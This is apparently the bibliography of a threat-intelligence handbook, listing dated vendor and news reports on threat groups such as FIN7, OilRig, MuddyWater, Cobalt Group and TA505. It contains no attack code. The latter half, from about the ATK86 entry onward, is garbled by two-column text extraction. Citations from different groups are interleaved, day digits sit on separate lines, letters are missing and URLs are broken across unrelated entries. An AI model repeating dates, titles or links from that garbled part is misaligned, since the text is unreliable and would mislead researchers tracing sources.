16/03/2017, ThreatPost, Fileless Malware Campaigns Tied to Same Attacker, https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/
24/04/2017, FireEye, FIN7 Evolution and the Phishing LNK, https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
03/05/2017, FireEye, To SDB Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
09/06/2017, Morphisec, FIN7 TAKES ANOTHER BITE AT THE RESTAURANT INDUSTRY, http://blog.morphisec.com/fin7-attacks-restaurant-industry
25/07/2017, Gigamon, Footprints of Fin7: Tracking Actor Patterns (Part 1), https://atr-blog.gigamon.com/2017/07/25/footprints-of-fin7-tracking-actor-patterns-part-1/
26/07/2017, Gigamon, Footprints of FIN7: Tracking Actor Patterns (Part 2), https://atr-blog.gigamon.com/2017/07/26/footprints-of-fin7-tracking-actor-patterns-part-2/
31/07/2017, ProofPoint, FIN7/Carbanak threat actor unleashes Bateleur JScript backdoor, https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor
13/10/2017, Morphisec, FIN7 DISSECTED: HACKERS ACCELERATE PACE OF INNOVATION, http://blog.morphisec.com/fin7-attack-modifications-revealed
01/08/2018, FireEye, On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation, https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
01/08/2018, WIRED, THE WILD INNER WORKINGS OF A BILLION-DOLLAR HACKING GROUP, https://www.wired.com/story/fin7-wild-inner-workings-billion-dollar-hacking-group/
01/08/2018, ZDNet, DOJ arrests three Ukrainian nationals from Fin7 cybercrime group, https://www.zdnet.com/article/doj-arrests-indicts-three-ukrainian-nationals-from-fin7-cybercrime-group/
21/11/2018, Morphisec, FIN7 NOT FINISHED – MORPHISEC SPOTS NEW CAMPAIGN, http://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign
20/03/2019, ThreatPost, Fin7 Ramps Up Campaigns With Two Fresh Malware Samples, https://threatpost.com/fin7-ramps-up-campaigns-with-two-fresh-malware-samples/142975/
20/03/2019, ZDNet, Global threat group Fin7 returns with new SQLRat malware, https://www.zdnet.com/article/global-cybergang-fin7-returns-with-new-sqlrat-malware/
20/03/2019, FlashPoint, FIN7 Revisited: Inside Astra Panel and SQLRat Malware, https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/
21/03/2019, DarkReading, FIN7 Cybercrime Gang Rises Again, https://www.darkreading.com/analytics/fin7-cybercrime-gang-rises-again-/d/d-id/1334228
21/03/2019, SecurityWeek, FIN7 Hackers Use New Malware in Recent Attacks, https://www.securityweek.com/fin7-hackers-use-new-malware-recent-attacks
21/03/2019, SCMagazine, Despite arrests FIN7 launched 2018 attack campaigns featuring new malware, https://www.scmagazine.com/home/security-news/despite-arrests-fin7-launched-2018-attack-campaigns-featuring-new-malware/
08/05/2019, Kaspersky, Fin7 hacking group targets more than 130 companies after leaders’ arrest, https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest
08/05/2019, SecureList, FIN7.5: the infamous cybercrime rig “FIN7” continues its activities, https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

ATK33
26/04/2016, Microsoft, PLATINUM - Targeted attacks in South and Southeast Asia
25/05/2016, Kaspersky, CVE-2015-2545 Overview of current threats
05/06/2019, Kaspersky, Platinum is back
MITRE, PLATINUM, https://attack.mitre.org/groups/G0068/

ATK35
MITRE ATT&CK, Group: Charming Kitten
MITRE ATT&CK, Group: APT33
APT Groups and Operations
Malpedia, Charming Kitten
Malpedia, APT33
Malpedia, MAGNALLIUM
Pastebin.com, 25/11/2012, PARASTOO - 1
Reuters, 29/05/2014, Iranian hackers use fake Facebook accounts to spy on U.S., others
Kaspersky, 27/04/2016, Freezer Paper around Free Meat - Repackaging Open Source BeEF for Tracking and More
Iran Threats, 06/02/2017, iKittens: Iranian Actor Resurfaces with Malware for Mac (MacDownloader)
FireEye, 20/09/2017, Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware
ClearSky, 05/12/2017, Charming Kitten: Iranian Cyber Espionage Against Human Rights Activists, Academic Researchers and Media Outlets
Recorded Future, 26/06/2019, Iranian Threat Actor Amasses Large Cyber Operations Infrastructure Network to Target Saudi Organizations

ATK40
PaloAlto, 08/11/2017, OilRig Deploys “ALMA Communicator” – DNS Tunneling Trojan
FireEye, 07/12/2017, New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit
PaloAlto, 11/12/2017, OilRig Performs Tests on the TwoFace Webshell
PaloAlto, 25/01/2018, OilRig uses RGDoor IIS Backdoor on Targets in the Middle East
PaloAlto, 23/02/2018, OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan
Nyotron, 03/2018, OilRig is Back with Next-Generation Tools and Techniques
Dragos, 17/05/2018, CHRYSENE
PaloAlto, 25/07/2018, OilRig Targets Technology Service Provider and Government Agency with QUADAGENT
PaloAlto, 04/09/2018, OilRig targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE
PaloAlto, 12/09/2018, OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government
PaloAlto, 16/11/2018, Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery
CrowdStrike, 27/11/2018, Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN
PaloAlto, 16/04/2019, DNS Tunneling in the Wild: Overview of OilRig’s DNS Tunneling
Talos, 23/04/2019, DNSpionage brings out the Karkoff
PaloAlto, 30/04/2019, Behind the Scenes with OilRig
Bleeping Computer, 03/06/2019, New Email Hacking Tool from OilRig APT Group Leaked Online
Marco Ramilli, 06/06/2019, APT34: Jason project
eutopian.io, 16/06/2019, APT34 Tools Leak

ATK41
06/04/2017, FireEye, APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat
15/08/2018, Intrusion Truth, APT10 was managed by the Tianjin bureau of the Chinese Ministry of State Security
13/09/2018, FireEye, APT10 Targeting Japanese Corporations Using Updated TTPs
06/02/2019, Recorded Future, APT10 Targeted Norwegian MSP and US Companies in Sustained Campaign
24/05/2019, enSilo, Uncovering New Activity By APT10
16/02/2017, Unit42, menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations
23/12/2016, Cylance, Operation Dust Storm
26/06/2019, Reuters, Inside the West’s failed fight against China’s ‘Cloud Hopper’ hackers

ATK51
16/03/2017, Morphisec, Morphisec Discovers New Fileless Attack Framework
26/09/2017, Malwarebytes, Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity
04/10/2017, Security 0wnage, Continued Activity targeting the Middle East
14/11/2017, PaloAlto, Muddying the Water: Targeted Attacks in the Middle East
12/03/2018, TrendMicro, Campaign Possibly Connected to “MuddyWater” Surfaces in the Middle East and Central Asia
13/03/2018, FireEye, Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign
08/05/2018, Security 0wnage, Clearing the MuddyWater - Analysis of new MuddyWater Samples
14/06/2018, TrendMicro, Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor
10/10/2018, Kaspersky, MuddyWater expands operations
28/11/2018, ClearSky, MuddyWater Operations in Lebanon and Oman
30/11/2018, TrendMicro, New PowerShell-based Backdoor Found in Turkey, Strikingly Similar to MuddyWater Tools
07/12/2018, Yoroi, Dissecting the MuddyWater Infection Chain
10/12/2018, Symantec, Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms
21/03/2019, 360.net, Suspected MuddyWater APT organization's latest attack activity analysis against Iraqi mobile operator Korek Telecom
10/04/2019, CheckPoint, The Muddy Waters of APT Attacks
15/04/2019, ClearSky, Iranian APT MuddyWater Attack Infrastructure Targeting Kurdish Political Groups and Organizations in Turkey
20/05/2019, Talos, Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques
10/06/2019, TrendMicro, New MuddyWater Activities Uncovered
25/06/2019, 360.net, Analysis of MuddyC3, a New Weapon Used by MuddyWater

ATK52
10/11/2014, Kaspersky, The Darkhotel APT
10/08/2015, Kaspersky, Darkhotel’s attacks in 2015
09/06/2016, Microsoft, Reverse-engineering DUBNIUM
20/10/2017, Virus Bulletin, VB2017 paper: Walking in your enemy's shadow: when fourth-party collection becomes attribution hell
18/07/2017, BitDefender, Inexsmar: An unusual DarkHotel campaign
13/05/2019, Kaspersky, ScarCruft continues to evolve, introduces Bluetooth harvester
24/06/2019, Tencent, https://s.tencent.com/research/report/741.htm

ATK66
16/02/2015, Trend Micro, Operation Arid Viper: Bypassing the Iron Dome, https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf
17/02/2015, Kaspersky, The Desert Falcons Targeted Attacks, https://securelist.com/the-desert-falcons-targeted-attacks/68817/
18/09/2015, Proofpoint, Operation Arid Viper Slithers Back into View, https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View
09/03/2017, 360 Core Security, Two-tailed scorpion tissue (APT-C-23) stretches to the needles of the two countries, http://blogs.360.cn/post/%E5%8F%8C%E5%B0%BE%E8%9D%8E%E7%BB%84%E7%BB%87%EF%BC%88apt-c-23%EF%BC%89%E4%BC%B8%E5%90%91%E5%B7%B4%E4%BB%A5%E4%B8%A4%E5%9B%BD%E7%9A%84%E6%AF%92%E9%92%88.html
05/04/2017, Palo Alto Networks, Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA, https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/
14/06/2017, ThreatConnect, Phantom of the Opaera: New KASPERAGENT Malware Campaign, https://threatconnect.com/blog/kasperagent-malware-campaign/
19/06/2017, Cisco Talos, Delphi Used to Score Against Palestine, https://blog.talosintelligence.com/2017/06/palestine-delphi.html
05/10/2017, Lookout, FrozenCell: Multi-platform surveillance campaign against Palestinians, https://blog.lookout.com/frozencell-mobile-threat
18/12/2017, Trend Micro, New GnatSpy Mobile Malware Family Discovered, https://blog.trendmicro.com/trendlabs-security-intelligence/new-gnatspy-mobile-malware-family-discovered/
16/04/2018, Lookout, Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East, https://blog.lookout.com/desert-scorpion-google-play
08/07/2018, Check Point, APT Attack In the Middle East: The Big Bang, https://research.checkpoint.com/apt-attack-middle-east-big-bang/
25/07/2018, Radware, Micropsia Malware, https://blog.radware.com/security/2018/07/micropsia-malware/
10/08/2018, Symantec, Ongoing Android Malware Campaign Targets Palestinians - Part 1, https://www.symantec.com/blogs/expert-perspectives/ongoing-android-malware-campaign-targets-palestinians-part-1
31/08/2018, Symantec, Ongoing Android Malware Campaign Targets Palestinians - Part 2, https://www.symantec.com/blogs/expert-perspectives/ongoing-android-malware-campaign-targets-palestinians-part-2

ATK67
MITRE, Cobalt Group, https://attack.mitre.org/groups/G0080/
26/08/2016, FireEye, RIPPER ATM Malware and the 12 Million Baht Jackpot, https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html
19/09/2016, TrendMicro, Untangling the Ripper ATM Malware, https://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/
16/12/2016, Positive Technologies, COBALT SNATCH, https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
01/06/2017, proofpoint, Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions, https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target
01/08/2017, Positive Technologies, COBALT STRIKES BACK: AN EVOLVING MULTINATIONAL THREAT TO FINANCE, https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf
07/08/2017, TrendMicro, Backdoor-carrying Emails Set Sights on Russian-speaking Businesses, https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/
15/08/2017, Group-IB, Secrets of Cobalt, https://www.group-ib.com/blog/cobalt
20/11/2017, TrendMicro, Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks, https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/
22/11/2017, ReversingLabs, ReversingLabs’ YARA rule detects a Cobalt payload exploiting CVE-2017-11882, https://blog.reversinglabs.com/blog/reversinglabs-yara-rule-detects-cobalt-payload-exploiting-cve-2017-11882
24/11/2017, BleepingComputer, A Hacking Group Is Already Exploiting the Office Equation Editor Bug, https://www.bleepingcomputer.com/news/security/a-hacking-group-is-already-exploiting-the-office-equation-editor-bug/
28/11/2017, RISKIQ, Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions, https://www.riskiq.com/blog/labs/cobalt-strike/
16/01/2018, RISKIQ, First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks, https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/
18/02/2018, Crowdstrike, 2018 Global Threat Report, https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
26/03/2018, EUROPOL, Mastermind behind EUR 1 billion cyber bank robbery arrested in Spain, https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

ATK73
14/07/2016, Bankinfo Security, ‘The Dark Overlord’ Advertises Stolen Source Code, https://www.bankinfosecurity.com/dark-overlord-sells-source-code-a-9260
16/11/2016, Motherboard, Hackers Threaten Release of Atlanta Professional Athletes’ Medical Data, https://www.vice.com/en_us/article/8q8e33/hackers-threaten-release-of-atlanta-professional-athletes-medical-data
17/11/2016, Motherboard, Hackers Claim Theft of Data from Gorilla Glue, https://www.vice.com/en_us/article/53dq8k/hackers-claim-theft-of-data-from-gorilla-glue
25/09/2016, Vocativ, Man Connected To Pippa Middleton Hack Reveals Exclusive Details, https://www.vocativ.com/362147/pippa-middleton-hack-photos-arrest-uk/
26/07/2016, Digital Shadows, Thedarkoverlord – losing his patients?, https://www.digitalshadows.com/blog-and-research/thedarkoverlord-losing-his-patients/
28/09/2016, HackRead, DarkNet Hackers ‘DarkOverlord’ Hack WestPark Capital Bank for Ransom, https://www.hackread.com/darkoverlord-hacks-westpark-capital-bank/
28/11/2016, Graham Cluley, No, I won’t help you blackmail the company you just hacked, https://www.grahamcluley.com/gorilla-glue-blackmail/
29/06/2016, Bankinfo Security, Here’s How a Hacker Extorts a Clinic, http://www.bankinfosecurity.com/blogs/heres-how-hacker-extorts-clinic-p-2168
02/05/2017, Motherboard, Meet the Hackers Holding Netflix to Ransom, https://www.vice.com/en_us/article/ae5w7a/meet-the-hackers-holding-netflix-to-ransom
10/05/2017, Daily Beast, ‘Dark Overlord’ Hackers Text Death Threats to Students, Then Dump Voicemails From Victims, https://www.thedailybeast.com/dark-overlord-hackers-text-death-threats-to-students-then-dump-voicemails-from-victims
13/03/2018, Global Legal Post, US law firm hack hits global insurer, http://www.globallegalpost.com/big-stories/us-law-firm-hack-hits-global-insurer-15490236/
16/05/2018, Bleeping Computer, Suspected Member of TheDarkOverlord Hacking Group Arrested in Serbia, https://www.bleepingcomputer.com/news/security/suspected-member-of-thedarkoverlord-hacking-group-arrested-in-serbia/
27/09/2018, Digital Shadows, Thedarkoverlord Out to KickAss and Cash Out Their Data, https://www.digitalshadows.com/blog-and-research/thedarkoverlord-out-to-kickass-and-cash-out-their-data/
02/01/2019, Forbes, Who Is The Dark Overlord Threatening To Leak Sensitive 9/11 Documents?, https://www.forbes.com/sites/kateoflahertyuk/2019/01/02/hacking-group-the-dark-overlord-threatens-to-leak-sensitive-911-documents/
10/01/2019, DataBreaches.net, “Crafty Cockney,” associate of thedarkoverlord, fighting extradition to the U.S. after being charged with hacking, extorting, U.S. medical entities in 2016, https://www.databreaches.net/crafty-cockney-associate-of-thedarkoverlord-fighting-extradition-to-the-u-s-after-being-charged-with-hacking-extorting-u-s-medical-entities-in-2016/
08/01/2019, CyberScoop, The Dark Overlord was recruiting employees and looking for attention before 9/11 data dump, https://www.cyberscoop.com/dark-overlord-recruiting-employees-looking-attention-911-data-dump/
24/01/2019, SenseCy, What will The Dark Overlord Do Next – a CTI Assessment, https://blog.sensecy.com/2019/01/24/the-dark-overlord-and-the-9-11-papers-leak-whats-next/

ATK77
27/07/2018, PaloAlto, New Threat Actor Group DarkHydrus Targets Middle East Government
16/01/2019, 360.net, Latest Target Attack of DarkHydruns Group Against Middle East

ATK78
19/06/2018 [Retrieved: 11/06/2019], Symantec, Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies, https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets
MITRE, Thrip, https://attack.mitre.org/groups/G0076/

ATK80
AlienVault, Golden Rat
04/01/2018, 360.net, Goldmouse Organization - Targeted Attacks in Syria (english)
23/07/2018, Cybaze, Chinese APT 27’s long-term espionage campaign in Syria is still ongoing
19/03/2019, 360.net, APT-C-27 (Goldmouse): Suspected Target Attack against the Middle East with WinRAR Exploit

ATK83
10/01/2019, Singapore's Committee of Inquiry, Public Report of the Committee of Inquiry (COI) into the cyber attack on Singapore Health Services Private Limited Patient Database
06/03/2019, Symantec, Whitefly: Espionage Group has Singapore in Its Sights
19/03/2019, NSHC, SectorM04 Targeting Singapore – An Analysis

ATK86
01/11/2017, Kaspersky, Silence – a new Trojan attacking financial organizations, https://securelist.com/the-silence/83009/
 5/09/2018, Group IB, Silence Moving into the Darkside, https://


0 27/April/2015, pwc, Attacks against Israeli & Palestinian interests,
www.group-ib.com/blog/silence https://pwc.blogs.com/cyber_security_updates/2015/04/attacks-
against-israeli-palestinian-interests.html
 5/09/2018, ZDnet, New Silence hacking group suspected of
0
having ties to cyber-security industry, https://www.zdnet.com/ 28/September/2015, Kaspersky, Gaza cybergang, where’s your
article/new-silence-hacking-group-suspected-of-having-ties-to- IR team?, https://securelist.com/gaza-cybergang-wheres-your-
cyber-security-industry/ ir-team/72283/
 4/01/2019, Reaqta, Silence group targeting Russian Banks via
2 January/2016, ClearSky, Operation DustySky, https://www.
Malicious CHM, https://reaqta.com/2019/01/silence-group- clearskysec.com/wp-content/uploads/2016/01/Operation%20
targeting-russian-banks/ DustySky_TLP_WHITE.pdf
 3/07/2019, Bleeping Computer, Silence Group Likely Behind
0 June/2016, ClearSky, Operation DustySky Part 2, https://www.
Recent $3M Bangladesh Bank Heist, https://www.bleepingcomputer. clearskysec.com/wp-content/uploads/2016/06/Operation-
com/news/security/silence-group-likely-behind-recent-3m- DustySky2_-6.2016_TLP_White.pdf
bangladesh-bank-heist/
3 1/January/2017, Security Week,Gaza Cybergang Uses
 1/08/2019, Group IB, Silence 2.0 Going Global, https://www.
2 QuasarRAT to Target Governments,https://www.securityweek.
group-ib.com/resources/threat-research/silence_2.0.going_global.pdf com/gaza-cybergang-uses-quasarrat-target-governments
11/April/2017, FireEye, CVE-2017-0199: In the Wild Attacks
ATK88 Leveraging HTA Handler, https://www.fireeye.com/blog/threat-
 1/04/2016, FireEye, FOLLOW THE MONEY: DISSECTING THE
0 research/2017/04/cve-2017-0199-hta-handler.html
OPERATIONS OF THE CYBER CRIME GROUP FIN6, https://
www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf 30/October/2017, Security Week, Hamas-Linked ‘Gaza Cybergang’
Has New Tools, Targets, https://www.securityweek.com/hamas-
 5/06/2016, Secure Week, New FrameworkPOS Campaign Gains
1 linked-gaza-cybergang-has-new-tools-targets
Momentum, https://www.securityweek.com/new-frameworkpos-
campaign-gains-momentum 30/October/2017, Kaspersky, Gaza Cybergang – updated activity
in 2017,l https://securelist.com/gaza-cybergang-updated-2017-
 6/07/2016, NJCCIC, FrameworkPOS, https://www.cyber.nj.gov/
0 activity/82765/
threat-profiles/pos-malware-variants/frameworkpos
30/January/2018, International Business TImes, TopHat campaign:
 1/09/2018, Malware Analysis, X-Force IRIS Identifies FIN6
0 Hackers target Middle East using malware-laced Arabic files about
Activity on POS Networks,https://malware.news/t/x-force-iris- political events, https://www.ibtimes.co.uk/tophat-campaign-
identifies-fin6-activity-on-pos-networks/22509 hackers-target-middle-east-using-malware-laced-arabic-files-
 5/09/2018, ZDNet, FIN6 returns to attack retailer point of
0 about-political-events-1657217
sale systems in US, Europe, https://www.zdnet.com/article/fin6- 12/April/2018, Kaspersky, Operation Parliament, who is doing
returns-to-attack-retailers-in-us-europe/ what?, https://securelist.com/operation-parliament-who-is-
 1/02/2019, Visa Payment Fraud Disruption, FIN6 Cybercrime
0 doing-what/85237/
Group Expands Threat to eCommerce Merchants, https://usa. 09/July/2018, Security Week, New Attacks on Palestine Linked to
visa.com/dam/VCOM/global/support-legal/documents/fin6- ‘Gaza Cybergang’, https://www.securityweek.com/new-attacks-
cybercrime-group-expands-threat-To-ecommerce-merchants.pdf palestine-linked-gaza-cybergang
 5/04/2019, FireEye, Pick-Six: Intercepting a FIN6 Intrusion,
0 12/September/2018, GitHub, ThreatHunter-Playbook/playbooks/
an Actor Recently Tied to Ryuk and LockerGoga Ransomware, groups/Molerats.md, https://github.com/Cyb3rWard0g/ThreatHunter-
https://www.fireeye.com/blog/threat-research/2019/04/pick- Playbook/blob/master/playbooks/groups/Molerats.md
six-intercepting-a-fin6-intrusion.html
1 0/April/2019, Kaspersky, The Gaza cybergang and its
ATK89 SneakyPastes campaign, https://www.kaspersky.com/blog/
gaza-cybergang/26363/
 3/January/2012, Walla, ‫ןוליאל שא םיבישמ םירקאהה‬, ‫םיהות תשרבו‬
1
‫ויתונווכ לע‬, https://news.walla.co.il/item/2500063 14/February/2019, 360 Threat Intelligence, Suspected Molerats’
New Attack in the Middle East, https://ti.360.net/blog/articles/
 2/July/2013, Threat Post, njRAT Espionage Malware Targets
0 suspected-molerats-new-attack-in-the-middle-east-en/
Middle Eastern Governments, Telecoms and Energy, https://
threatpost.com/njrat-espionage-malware-targets-middle-eastern- 2 3/April/2019, ‫ימואלה רבייסה ךרעמ‬, ‫ הפיקתה תצובק‬Gaza
governments-telecoms-and-energy/101162/ Cybergang, https://www.gov.il/BlobFolder/reports/gaza-cybergang/
he/GazaCybergang-CERT-IL-W-908.pdf
 3/August/2013, Fire Eye, Operation Molerats: Middle East
2
Cyber Attacks Using Poison Ivy, https://www.fireeye.com/blog/
threat-research/2013/08/operation-molerats-middle-east-cyber- ATK91
attacks-using-poison-ivy.html  ecember, 14, 2017, FireEye, Attackers Deploy New ICS Attack
D
Framework “TRITON” and Cause Operational Disruption to
 9/February/2014, FireEye, XtremeRAT: Nuisance or Threat?,
1 Critical Infrastructure
https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-
nuisance-or-threat.html June, 07, 2018, FireEye, A Totally Tubular Treatise on TRITON
and TriStation
 2/June/2014, FireEye, Molerats, Here for Spring!, https://
0
www.fireeye.com/blog/threat-research/2014/06/molerats-here- O ctober, 23, 2018, FireEye, TRITON Attribution: Russian
for-spring.html Government-Owned Lab Most Likely Built Custom Intrusion Tools
for TRITON Attackers
 4/June/2014, Dark Reading, Molerats Go After Governments,
0
US Financial Institution, https://www.darkreading.com/molerats- February, 25, 2019, DragoS, Evolution of ICS Attacks and the
go-after-governments-us-financial-institution/d/d-id/1269423 Prospects for Future Disruptive Events
 ebruary/2015, Kaspersky, The Desert Falcons Targeted attacks,
F April, 10, 2019, FireEye, TRITON Actor TTP Profile, Custom
https://media.kasperskycontenthub.com/wp-content/uploads/ Attack Tools, Detections, and ATT&CK Mapping
sites/43/2018/03/08064309/The-Desert-Falcons-targeted- June, 14, 2019, Dragos, Threat Proliferation in ICS Cybersecurity:
attacks.pdf XENOTIME Now Targeting Electric Sector, in Addition to Oil and Gas

218 The Cyberthreat Handbook • Thales - Verint


 ctober, 12, 2017, The Conversation, http://theconversation.
O ATK103
com/russie-arabie-saoudite-un-rapprochement-qui-agace-  7/09/2017, Proofpoint, Threat Actor Profile: TA505, From
2
washington-85475 Dridex to GlobeImposter
J une, 21, 2018, Le Monde, https://www.lemonde.fr/economie/ 08/06/2018, Proofpoint, TA505 shifts with the times
article/2018/06/21/petrole-l-arabie-saoudite-et-la-russie-font-
front-commun-face-a-l-iran_5318906_3234.html  9/07/2018, Proofpoint, TA505 Abusing SettingContent-ms
1
within PDF files to Distribute FlawedAmmyy RAT
2019, DragoS, https://dragos.com/resource/xenotime/
 5/11/2018, Proofpoint, tRat: New modular RAT appears in
1
ATK 92 multiple email campaigns
MITRE, Gorgon Group, https://attack.mitre.org/groups/G0078/  3/12/2018, Proofpoint, From Thanksgiving to Christmas,
0
cybercriminals cash in on a range of threats over the holidays
 heck Point, Njrat, https://threatpoint.checkpoint.com/ThreatPortal/
C
threat?threatId=9478&threatType=malwarefamily  5/04/2019, Cybereason, Threat Actor TA505 Targets Financial
2
Enterprises Using LOLBins and a New Backdoor Malware
MITRE, Crimson, https://attack.mitre.org/software/S0115/
 8/05/2019, ESTsecurity, TA505 organization, spreads malicious
0
 4/03/2016, threat post, https://threatpost.com/espionage-
0
e-mail disguised as Excel document again
malware-watering-hole-attacks-target-diplomats/116600/
16/05/2019, Yoroi, The Stealthy Email Stealer in the TA505 Arsenal
 9/01/2017, NJCCIC, NJRat, https://www.cyber.nj.gov/threat-
1
profiles/trojan-variants/njrat  2/06/2019, TrendMicro, Shifting Tactics: Breaking Down
1
TA505 Group’s Use of HTML, RATs and Other Techniques in
 7/10/2017, paloalto, Tracking Subaat: Targeted Phishing Attack
2
Latest Campaigns
Leads to Threat Actor’s Repository, https://unit42.paloaltonetworks.
com/unit42-tracking-subaat-targeted-phishing-attacks-point-  2/07/2019, Proofpoint, TA505 begins summer campaigns with
0
leader-threat-actors-repository/ a new pet malware downloader, AndroMut, in the UAE, South
Korea, Singapore, and the United States
 1/01/2018,NJCCIC, Quasar RAT, https://www.cyber.nj.gov/
3
threat-profiles/trojan-variants/quasar-rat
ATK104
 2/08/2018, paloalto, The Gorgon Group: Slithering Between
0  5/05/2019, Proofpoint, Threat Actor Profile: TA542, From
1
Nation State and Cybercrime, https://unit42.paloaltonetworks. Banker to Malware Distribution Service
com/unit42-gorgon-group-slithering-nation-state-cybercrime/
 8/02/2018, Crowdstrike, Meet CrowdStrike’s Adversary of the
0
 2/10/2018, Krebs on Security, Who Is Agent Tesla?, https://
2 Month for February: MUMMY SPIDER
krebsonsecurity.com/tag/nanocore-rat/
 7/04/2019, paloalto, Aggah Campaign: Bit.ly, BlogSpot, and
1 ATK112
Pastebin Used for C2 in Large Scale Campaign, https://unit42.  3/05/2018, Kaspersky SecureList, https://securelist.com/whos-
0
paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and- who-in-the-zoo/85394/
pastebin-used-for-c2-in-large-scale-campaign/
 7/05/2019, 360.cn, Saber lion organization (APT-C-38) attack
2
 8/04/2019, Bleeping Computer, https://www.bleepingcomputer.
1 activity revealed (translate)
com/news/security/revengerat-distributed-via-bitly-blogspot-and-
pastebin-c2-infrastructure/ ATK113
 6/01/2019, ZDNet, NanoCore Trojan is Protected in Memory
1  1/05/2016, FireEye, Threat Actor Leverages Windows Zero-day
1
from being Killed off, https://www.zdnet.com/article/nanocore- Exploit in Payment Card Data Attacks
trojan-stops-you-killing-its-process/  0/06/2017, Root9B, SHELLTEA + POSLURP MALWARE MEMORY-
2
RESIDENT POINT-OF-SALE MALWARE ATTACKS IN DUSTRY
ATK97
 0/08/2014, Kaspersky, “El Machete”, https://securelist.com/
2  0/06/2019, Morphisec, FIN8 is Back in Business, Targeting
1
el-machete/66108/ the Hospitality Industry

 2/03/2017, Threat Vector, Defending against El Machete's


2 ATK116
Malware Attacks, https://threatvector.cylance.com/en_us/home/  4/01/2013, Kaspersky, “Red October” Diplomatic Cyber Attacks
1
defending-against-el-machetes-malware-attacks.html Investigation, https://securelist.com/red-october-diplomatic-cyber-
 4/07/2017, IBTimes, El Machete hackers cut through the
2 attacks-investigation/36740/
globe stealing over 100GB data from governments, https://www.  7/01/2013, Kaspersky, “Red October” – Part Two, the Modules,
1
ibtimes.co.uk/el-machete-hackers-cut-through-globe-stealing- https://securelist.com/red-october-part-two-the-modules/57645/
over-100gb-data-governments-1613500
 9/12/2014, Symantec, Blue Coat Exposes “The Inception
0
 5/08/2019, ZDnet, A cyber-espionage group has been stealing
0 Framework”; Very Sophisticated, Layered Malware Attack Targeted
files from the Venezuelan military, https://www.zdnet.com/ at Military, Diplomats, and Bus, https://www.symantec.com/
article/a-cyber-espionage-group-has-been-stealing-files-from- connect/blogs/blue-coat-exposes-inception-framework-very-
the-venezuelan-military/ sophisticated-layered-malware-attack-targeted-milit
 5/08/2019, ESET, ESET discovers government targets under
0  0/12/2014, Kaspersky, Cloud Atlas: RedOctober APT is back
1
attack by cyber spies stealing gigabytes of confidential document, in style, https://securelist.com/cloud-atlas-redoctober-apt-is-
https://www.eset.com/us/about/newsroom/press-releases/ back-in-style/68083/
eset-discovers-government-targets-under-attack-by-cyber-spies-
stealing-gigabytes-of-confidential-doc/  4/03/2018, Symantec, Inception Framework: Alive and Well,
1
and Hiding Behind Proxies, https://www.symantec.com/blogs/
 5/08/2019, ESET, MACHETE JUST GOT SHARPER, https://www.
0 threat-intelligence/inception-framework-hiding-behind-proxies
welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
 5/11/2018, PaloAlto, Inception Attackers Target Europe with
0
 6/08/2019, Homeland Security Today, Secretive ‘Machete’
